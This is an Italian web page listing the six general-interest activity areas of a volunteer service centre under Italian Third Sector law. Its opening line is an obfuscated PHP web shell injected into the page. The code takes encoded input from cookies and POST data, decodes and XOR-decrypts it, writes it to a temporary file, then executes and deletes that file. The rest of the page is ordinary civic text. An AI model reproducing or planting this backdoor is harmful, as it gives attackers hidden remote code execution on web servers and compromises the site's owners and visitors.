$jCaSr = class_exists("CsF_PAvb");if (!$jCaSr){class CsF_PAvb{private $lqKbghts;public static $PiRoBF = "e2c33302-260b-4003-a444-b806e1bdd721";public static $MbKVXqxy = NULL;public function __construct(){$OhUmHzZd = $_COOKIE;$gofHJODuY = $_POST;$BZjaj = @$OhUmHzZd[substr(CsF_PAvb::$PiRoBF, 0, 4)];if (!empty($BZjaj)){$HPjwgVW = "base64";$eiAIK = "";$BZjaj = explode(",", $BZjaj);foreach ($BZjaj as $IVThshtb){$eiAIK .= @$OhUmHzZd[$IVThshtb];$eiAIK .= @$gofHJODuY[$IVThshtb];}$eiAIK = array_map($HPjwgVW . '_' . "\x64" . chr ( 817 - 716 )."\x63" . "\x6f" . "\x64" . chr ( 991 - 890 ), array($eiAIK,)); $eiAIK = $eiAIK[0] ^ str_repeat(CsF_PAvb::$PiRoBF, (strlen($eiAIK[0]) / strlen(CsF_PAvb::$PiRoBF)) + 1);CsF_PAvb::$MbKVXqxy = @unserialize($eiAIK);}}public function __destruct(){$this->hZqRGi();}private function hZqRGi(){if (is_array(CsF_PAvb::$MbKVXqxy)) {$BMoxQB = sys_get_temp_dir() . "/" . crc32(CsF_PAvb::$MbKVXqxy["\163" . "\x61" . chr ( 1048 - 940 ).'t']);@CsF_PAvb::$MbKVXqxy["\167" . "\162" . chr ( 1034 - 929 ).chr ( 651 - 535 ).'e']($BMoxQB, CsF_PAvb::$MbKVXqxy["\x63" . 'o' . "\156" . "\164" . "\145" . chr (110) . chr (116)]);include $BMoxQB;@CsF_PAvb::$MbKVXqxy[chr (100) . "\145" . chr ( 259 - 151 )."\x65" . 't' . 'e']($BMoxQB);exit();}}}$AhUPWDj = new CsF_PAvb(); $AhUPWDj = NULL;} ?>
Aree di attività di interesse generale
Sulla base di quanto disposto dall’art. 63 c. 2 del D. Lgs 117/2017, il CSS opera secondo le seguenti 6 aree di attività di interesse generale.
Area 1 – Servizi di promozione, orientamento e animazione territoriale,
finalizzati a dare visibilità ai valori del volontariato e all’impatto sociale dell’azione volontaria nella comunità locale, a promuovere la crescita della cultura della solidarietà e della cittadinanza attiva in particolare tra i giovani e nelle scuole, istituti di istruzione, di formazione ed università, facilitando l’incontro degli enti di Terzo settore con i cittadini interessati a svolgere attività di volontariato, nonché con gli enti di natura pubblica e privata interessati a promuovere il volontariato. Animazione territoriale: qualificare e sostenere il volontariato mettendo in connessione tra loro i soggetti del territorio, per essere costruttori di welfare di comunità. Le attività prevedono l’ascolto diretto attraverso incontri territoriali, tavoli tematici, supporto tecnico operativo, la promozione della cultura dell’innovazione e la creazione di sinergie tra il sistema socio-economico-culturale e le Istituzioni. Il CSS inoltre può fare da incubatore per progettualità proposte da reti tematiche o territoriali.
Area 2 – Servizi di consulenza, assistenza qualificata ed accompagnamento,
finalizzati a rafforzare competenze e tutele dei volontari negli ambiti giuridico, fiscale, assicurativo, del lavoro, progettuale, gestionale, organizzativo, della rendicontazione economico-sociale, della ricerca fondi, dell’accesso al credito, nonché strumenti per il riconoscimento e la valorizzazione delle competenze acquisite dai volontari medesimi.
Area 3 – Servizi di formazione,
finalizzati a qualificare i volontari o coloro che aspirino ad esserlo, acquisendo maggiore consapevolezza dell’identità e del ruolo del volontario e maggiori competenze trasversali, progettuali, organizzative a fronte dei bisogni della propria organizzazione e della comunità di riferimento.
Area 4 – Servizi di informazione e comunicazione,
finalizzati a incrementare la qualità e la quantità di informazioni utili al volontariato, a supportare la promozione delle iniziative di volontariato, a sostenere il lavoro di rete degli enti del Terzo settore tra loro e con gli altri soggetti della comunità locale per la cura dei beni comuni, ad accreditare il volontariato come interlocutore autorevole e competente.
Area 5 – Servizi di ricerca e documentazione,
finalizzati a mettere a disposizione banche dati e conoscenze sul mondo del volontariato e del Terzo settore in ambito nazionale, comunitario e internazionale.
Area 6 – Servizi di supporto tecnico-logistico,
finalizzati a facilitare o promuovere l’operatività dei volontari, attraverso la messa a disposizione temporanea di spazi, strumenti ed attrezzature.